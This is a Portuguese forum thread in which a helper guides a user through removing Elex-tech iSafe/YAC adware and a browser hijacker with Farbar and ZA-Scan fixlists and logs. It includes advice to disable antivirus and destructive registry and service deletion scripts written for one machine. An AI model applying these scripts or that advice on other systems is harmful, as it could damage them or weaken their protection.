"C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u131-windows-au.exe " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\SkypeSetup.exe " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\tmp6CD8.tmp.exe " => não encontrado (a).
"C:\Windows\KMS-R@1n.exe " => não encontrado (a).
"C:\WINDOWS\KMS-R@1nHook.exe " => não encontrado (a).
"C:\WINDOWS\KMS-R@1nHook.dll " => não encontrado (a).
"C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe " => não encontrado (a).
2017-04-2C:\ProgramData\FileSplitUpLoad.dll => Erro: Nenhuma correção automática foi encontrada para esta entrada.
"C:\Users\Todos os Usuários\FileSplitUpLoad.dll 5 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll " => não encontrado (a).
"C:\Program Files (x86)\Elex-tech\YAC\libpng.dll " => não encontrado (a).
"C:\WINDOWS\system32\log " => não encontrado (a).
"C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech " => não encontrado (a).
"C:\Program Files (x86)\Elex-tech " => não encontrado (a).
"C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys " => não encontrado (a).
"C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys " => não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor não encontrado (a).
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\PSafeTray => valor não encontrado (a).
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\PSafeWDS => valor não encontrado (a).
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BAV mini setup => valor não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\ChromeHTML => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013} => chave não encontrado (a).
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6B446C8A-9266-46AB-85A6-E92C5974B43E} => valor não encontrado (a).
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{262684D5-BC5E-4F5C-8F2E-98E50A972023} => valor não encontrado (a).
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2F741DD0-F787-409E-A9D6-5CC26B96E1B6} => valor não encontrado (a).
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{63A99386-ABB8-4DE5-B464-8682581FB0CB} => valor não encontrado (a).
FirefoxU => serviço não encontrado (a).
iSafeService => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida
Kitty => serviço não encontrado (a).
KMS-R@1n => serviço não encontrado (a).
PSafeSVC => serviço não encontrado (a).
PSafeWD => serviço não encontrado (a).
WinSAPSvc => serviço não encontrado (a).
iSafeKrnl => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida
iSafeKrnlMon => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => chave removido (a) com sucesso.
iSafeKrnlMon => serviço removido (a) com sucesso.
iSafeKrnlR3 => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida
iSafeNetFilter => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida
"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe " => não encontrado (a).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe " => não encontrado (a).
"C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe " => não encontrado (a).
Ponto de Restauração criado com sucesso.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
========= Fim de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
=========== EmptyTemp: ==========
BITS transfer queue => 9898161 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 73045029 B
Java, Flash, Steam htmlcache => 2974 B
Windows/system/drivers => 221080330 B
Edge => 223528851 B
Chrome => 7424834 B
Firefox => 381608392 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 31636 B
ADEMIR MONTEIRO => 161927351 B
RecycleBin => 1988731 B
EmptyTemp: => 1 GB de dados temporários Removidos.
================================
Resultado dos arquivos que foram agendados para serem movidos (Modo de Inicialização: Normal) (Data&Hora: 09-05-2017 10:33:10)
Resultado dos registros marcados para excluir será exibido após a reinicialização:
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida
==== Fim de Fixlog 10:33:11 ====
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Ter 09 maio 2017, 11:09
Caro joram:
Para conseguir postar o Fixlog aí em cima, foram várias tentativas, pq os ataques voltaram com toda virulência! E ainda teve isto, ocupando o espaço para postagem!
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Para conseguir postar o Fixlog aí em cima, foram várias tentativas, pq os ataques voltaram com toda virulência! E ainda teve isto, ocupando o espaço para postagem!
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Ademir- Membro
- Mensagens : 63
Reputação : 4
Data de inscrição : 23/04/2017
Re: Firefox Muda Configuração Inicial de Repente
por joram Ter 09 maio 2017, 12:11
/_ Boa Tarde! Ademir _\
> Pelo visto vc ainda não configurou o Ghostery a remover as propagandas.
> Constatei,também,que vc copiou ao desktop a 1ª fixlist.
> Delete-a e repita a operação com esta que está no spoiler.
> Baixe: < [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] > ( ... by smeenk )
> Salve a ferramenta ZA-Scan,no desktop! ( Área de trabalho )
> Feche o navegador! << Importante!
> Desabilite seu antivírus,para que não detecte a ferramenta,como maliciosa.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
> Copie e cole ao Bloco de Notas,estas informações que estão em vermelho.
resetwmi;
C:\Program Files (x86)\elex-tech;fs
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\elex-tech;fs
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe;f
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe;f
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe;f
C:\Program Files (x86)\Elex-tech\YAC;fs
C:\Program Files (x86)\Elex-tech;fs
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeService];ra
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeService];r64
Set Search Settings;firefoxlook;
luckysearch123;a
luckysearch123;z
hao123;a
hao123;z
> Salve-as na área de trabalho,com o nome ZAScript. ( texto )
> Execute a ferramenta ZA-Scan.
> Aguarde sua conclusão!
> Haverá reboot!
> Poste o relatório! ( C:\zoek-results.txt )
[Abs]
> Pelo visto vc ainda não configurou o Ghostery a remover as propagandas.
> Constatei,também,que vc copiou ao desktop a 1ª fixlist.
> Delete-a e repita a operação com esta que está no spoiler.
- Spoiler:
- start
CloseProcesses:
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6F2E5825-C576-4536-A9BE-FF7181495112} URL =
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {BD62CFA9-F375-461C-A90E-AB90B578F202} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF user.js: detected! => C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js [2017-05-05]
FF NewTab: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF Homepage: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [41080 2015-09-30] ()
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participações Ltda) <==== ATENÇÃO
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== ATENÇÃO
S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== ATENÇÃO
2017-04-29 22:52 - 2017-04-29 22:52 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech
2017-04-25 22:01 - 2017-05-05 22:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-19 08:08 - 2017-04-19 08:08 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\3DM
2017-04-18 12:46 - 2017-04-18 12:46 - 00000000 ____D C:\Program Files (x86)\temp
2017-04-18 11:43 - 2017-04-18 11:44 - 01871912 _____ (LogMeIn, Inc.) C:\Users\ADEMIR MONTEIRO\Downloads\Support-LogMeInRescue.exe
2017-04-17 19:05 - 2017-04-25 09:27 - 00034328 _____ (Sysinternals - [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-17 19:05 - 2017-04-17 19:05 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 19:00 - 2017-04-27 10:04 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-02-19 11:21 - 2017-02-19 11:21 - 00002390 _____ C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium.lnk
2017-02-19 11:21 - 2017-02-19 11:21 - 00002382 _____ C:\Users\ADEMIR MONTEIRO\Desktop\Chromium.lnk
2017-02-19 11:20 - 2017-02-19 11:21 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\chromium
2017-02-09 20:48 - 2017-05-05 19:02 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\LocalLow\Mozilla
2017-04-28 14:15 - 2016-10-22 13:20 - 00000000 ____D C:\WINDOWS\System32\Tasks\R@1n-KMS
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
C:\Program Files (x86)\Elex-tech\YAC
C:\Program Files (x86)\Elex-tech
SubSystems: [Windows] ==> YAC
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Reboot:
Hosts:
end
> Baixe: < [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] > ( ... by smeenk )
> Salve a ferramenta ZA-Scan,no desktop! ( Área de trabalho )
> Feche o navegador! << Importante!
> Desabilite seu antivírus,para que não detecte a ferramenta,como maliciosa.
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
> Copie e cole ao Bloco de Notas,estas informações que estão em vermelho.
resetwmi;
C:\Program Files (x86)\elex-tech;fs
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\elex-tech;fs
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe;f
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe;f
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe;f
C:\Program Files (x86)\Elex-tech\YAC;fs
C:\Program Files (x86)\Elex-tech;fs
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter];ra
[HKLM\SYSTEM\CurrentControlSet\services\iSafeService];ra
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlBoot];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlKit];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlR3];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeNetFilter];r64
[-HKLM\SYSTEM\CurrentControlSet\services\iSafeService];r64
Set Search Settings;firefoxlook;
luckysearch123;a
luckysearch123;z
hao123;a
hao123;z
> Salve-as na área de trabalho,com o nome ZAScript. ( texto )
> Execute a ferramenta ZA-Scan.
> Aguarde sua conclusão!
> Haverá reboot!
> Poste o relatório! ( C:\zoek-results.txt )
[Abs]
Última edição por joram em Ter 09 maio 2017, 21:03, editado 1 vez(es)
joram- Administrador
- Mensagens : 4162
Reputação : 471
Data de inscrição : 26/01/2014
Localização : Rio de Janeiro
Re: Firefox Muda Configuração Inicial de Repente
por Ademir Ter 09 maio 2017, 20:44
Boa noite, joram
Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 08-05-2017
Executado por ADEMIR MONTEIRO (09-05-2017 18:59:50) Run:2
Executando a partir de C:\Users\ADEMIR MONTEIRO\Desktop
Perfis Carregados: ADEMIR MONTEIRO (Perfis Disponíveis: ADEMIR MONTEIRO)
Modo da Inicialização: Normal
==============================================
Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 08-05-2017
Executado por ADEMIR MONTEIRO (09-05-2017 18:59:50) Run:2
Executando a partir de C:\Users\ADEMIR MONTEIRO\Desktop
Perfis Carregados: ADEMIR MONTEIRO (Perfis Disponíveis: ADEMIR MONTEIRO)
Modo da Inicialização: Normal
==============================================
- Spoiler:
- fixlist Conteúdo:
*****************
start
CloseProcesses:
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =�
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =�
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {6F2E5825-C576-4536-A9BE-FF7181495112} URL =�
SearchScopes: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001 -> {BD62CFA9-F375-461C-A90E-AB90B578F202} URL = [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF user.js: detected! => C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js [2017-05-05]
FF NewTab: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
FF Homepage: Mozilla\Firefox\Profiles\w6trckk7.default -> [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participa��es Ltda)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [41080 2015-09-30] ()
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participa��es Ltda) <==== ATEN��O
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== ATEN��O
S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== ATEN��O
2017-04-29 22:52 - 2017-04-29 22:52 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech
2017-04-25 22:01 - 2017-05-05 22:01 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-25 09:28 - 2017-04-25 09:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-25 09:27 - 2017-04-25 09:27 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-19 08:08 - 2017-04-19 08:08 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\3DM
2017-04-18 12:46 - 2017-04-18 12:46 - 00000000 ____D C:\Program Files (x86)\temp
2017-04-18 11:43 - 2017-04-18 11:44 - 01871912 _____ (LogMeIn, Inc.) C:\Users\ADEMIR MONTEIRO\Downloads\Support-LogMeInRescue.exe
2017-04-17 19:05 - 2017-04-25 09:27 - 00034328 _____ (Sysinternals - [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-17 19:05 - 2017-04-17 19:05 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 19:00 - 2017-04-27 10:04 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-02-19 11:21 - 2017-02-19 11:21 - 00002390 _____ C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium.lnk
2017-02-19 11:21 - 2017-02-19 11:21 - 00002382 _____ C:\Users\ADEMIR MONTEIRO\Desktop\Chromium.lnk
2017-02-19 11:20 - 2017-02-19 11:21 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\Local\chromium
2017-02-09 20:48 - 2017-05-05 19:02 - 00000000 ____D C:\Users\ADEMIR MONTEIRO\AppData\LocalLow\Mozilla
2017-04-28 14:15 - 2016-10-22 13:20 - 00000000 ____D C:\WINDOWS\System32\Tasks\R@1n-KMS
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe�
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe�
C:\Program Files (x86)\Elex-tech\YAC
C:\Program Files (x86)\Elex-tech
SubSystems: [Windows] ==> YAC
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Reboot:
Hosts:
end
*****************
Processos fechados com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso.
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave não encontrado (a).
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida
HKCR\CLSID\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave não encontrado (a).
Não pode ser movido "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js" => Agendado para ser movido na reinicialização.
Não pode ser movido "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Mozilla\Firefox\Profiles\w6trckk7.default\user.js" => Agendado para ser movido na reinicialização.
Firefox "newtab" removido (a) com sucesso.
Firefox "homepage" removido (a) com sucesso.
iSafeService => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\AppleNotificationsSrv => chave removido (a) com sucesso.
AppleNotificationsSrv => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\hitmanpro37 => chave removido (a) com sucesso.
hitmanpro37 => serviço removido (a) com sucesso.
iSafeKrnl => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida
iSafeKrnlMon => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => chave removido (a) com sucesso.
iSafeKrnlMon => serviço removido (a) com sucesso.
iSafeKrnlR3 => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida
HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida
iSafeNetFilter => Não foi possível finalizar o serviço.
HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida
"C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech" pasta mover:
Não pode ser movido "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech" => Agendado para ser movido na reinicialização.
C:\WINDOWS\SysWOW64\1 => movido com sucesso
"C:\Program Files (x86)\Elex-tech" pasta mover:
Não pode ser movido "C:\Program Files (x86)\Elex-tech" => Agendado para ser movido na reinicialização.
C:\WINDOWS\SysWOW64\22 => movido com sucesso
C:\WINDOWS\SysWOW64\11 => movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\Local\3DM => movido com sucesso
C:\Program Files (x86)\temp => movido com sucesso
C:\Users\ADEMIR MONTEIRO\Downloads\Support-LogMeInRescue.exe => movido com sucesso
C:\WINDOWS\system32\Drivers\PROCEXP152.SYS => movido com sucesso
C:\Program Files (x86)\MIO => movido com sucesso
C:\Program Files (x86)\BiaoJi => movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium.lnk => movido com sucesso
C:\Users\ADEMIR MONTEIRO\Desktop\Chromium.lnk => movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\Local\chromium => movido com sucesso
C:\Users\ADEMIR MONTEIRO\AppData\LocalLow\Mozilla => movido com sucesso
C:\WINDOWS\System32\Tasks\R@1n-KMS => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6003891B-4C6E-4CE1-A27D-41743253E457} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6003891B-4C6E-4CE1-A27D-41743253E457} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{788B64E0-E064-4709-9A1E-A97700A54644} => chave removido (a) com sucesso.
Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe" => Agendado para ser movido na reinicialização.
"C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe " => não encontrado (a).
